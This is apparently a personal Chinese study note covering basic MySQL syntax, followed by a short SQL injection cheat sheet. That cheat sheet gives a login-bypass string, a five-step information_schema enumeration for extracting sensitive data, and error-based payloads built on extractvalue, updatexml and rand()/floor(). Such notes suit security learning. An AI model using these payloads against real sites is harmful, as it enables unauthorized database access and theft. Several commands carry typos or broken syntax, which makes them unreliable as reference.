sql笔记

show databass 显示所有数据库
show tables 显示当前数据库所有表

use db_name(数据库名字);选择某个数据库
desc table_name:展示字段信息;

select 字段名 from 表名 (也可以写数据库名.表名)

create 类 名
字段类型有,int,varchar(100)char(10)text double
二:数据库操作:
增:
数据库层面:
创建数据库:create database db_name;
数据表层面:
创建数据表:create table
table_name
(字段一的名字,字段一的类型)
(id int,
name varchar(100)),
charset utf8;
添加字段:
alter table (表名)table_name add (字段名字)column_type

	数据层面:
		插入数据:
				inset into 表名
				(column 1,column 2
				values
				(1,‘张三’ )
删:
	数据库层次:
		删除数据库:drop databass db_name;
	数据表层次:
		删除数据表:drop table table_name;
	数据层面:
		删除数据:delete from table_name where 条件(例如学号=2);

改:
	数据库层面:	
			alter database 数据库名字 charset 新的编码规则。
	数据表层面:	
		修改数据表名字:
			alter table table_name rename new_table_name;
		修改字段名字:
			alter table table_name change old_column_name new_column_name column_type
	数据层面:	
		更改数据内容:
			update table_name set column1 = value1,column2 = value2
			
			
查询:
	数据库层面:	
		show database;
	数据表层面:	
		show tables;
	数据层面:	
		select 内容
		[from]
		[where]
		
		[group by]
		[having]
		[order by]
		[limit]
		
	from:	
		(1)内容为表达式或者固定的数据:
			select 1;
		(2)as
			select 1 as one;
		(3)from	
			从哪里查就from哪里
		(4)distinct
			select distinct 字段1,字段2 ..from 表;
	where:
		where 后接条件
		算术运算符
		比较运算符	'='等于	'<>'不等于
		逻辑运算符
		模糊查找运算符:like '_'代替一个 '%'代替0个或者n个任意字符      
		'_'
		'%'
		正则匹配运算符:regexp
			https://blog.csdn.net/qq_36761831/article/details/82862135
			
	group by:
		用所给字段进行分组
		group by 字段1,字段2...;
		
	order by:
		对前面的结果进行排序行
		order by 字段1,【desc】...
	
	limit 子句:
		对前面的查询结果进行一个限制输出
		limit 起始行号,行数

union 联合查询:

	是一种结果纵向堆叠的查询;
	举例:
		information_schema库的重要性
		(系统自带的库)包含所有表名和字段名---columns  tables
		table_schema:库名
		table_name:表名
		column_name:字段名
		
		
		
		
		
	
	普通SQL注入流程:
		无waf防火墙:(网站应用防火墙)
			测试发现有注入点:
			某后端语句为:
				select ****from 一个库里面的一张表 where id='用户输入'
				
				0' or 1=1--   --+   --   #  万能密码
				
				
			step 1 测试字段数量:order by
			step 2 爆库名字
				select database()
				show database;
			step 3 爆表的名字
				select table_name from information_schema.tables where table_schema=""
			step 4 爆字段信息
				select column_name from information_schema.columns where table_name=""
			step 5 查询敏感信息
				select 字段 from 表名
			
			
			
	报错注入:
		updatexml()函数
		extractvalue()函数
		牵连个院里相似而且用的广泛,形式比较简单,推荐
		id=1 and(or) extractvalue(1, concat('~' sql_inject)  ) #
		and(or) updatexml(1, concat(0x7e,sql_inject), 1) # 
		rand()+floor()
		原理:利用group by 分组的性质报错
		and(select 1from (select count(*),concat(sql,floor(rand(0)*2)x from information_schema.tables group by x)a);
posted @ 2020-06-06 19:47  Kuller_Yan  阅读(36)  评论(0编辑  收藏  举报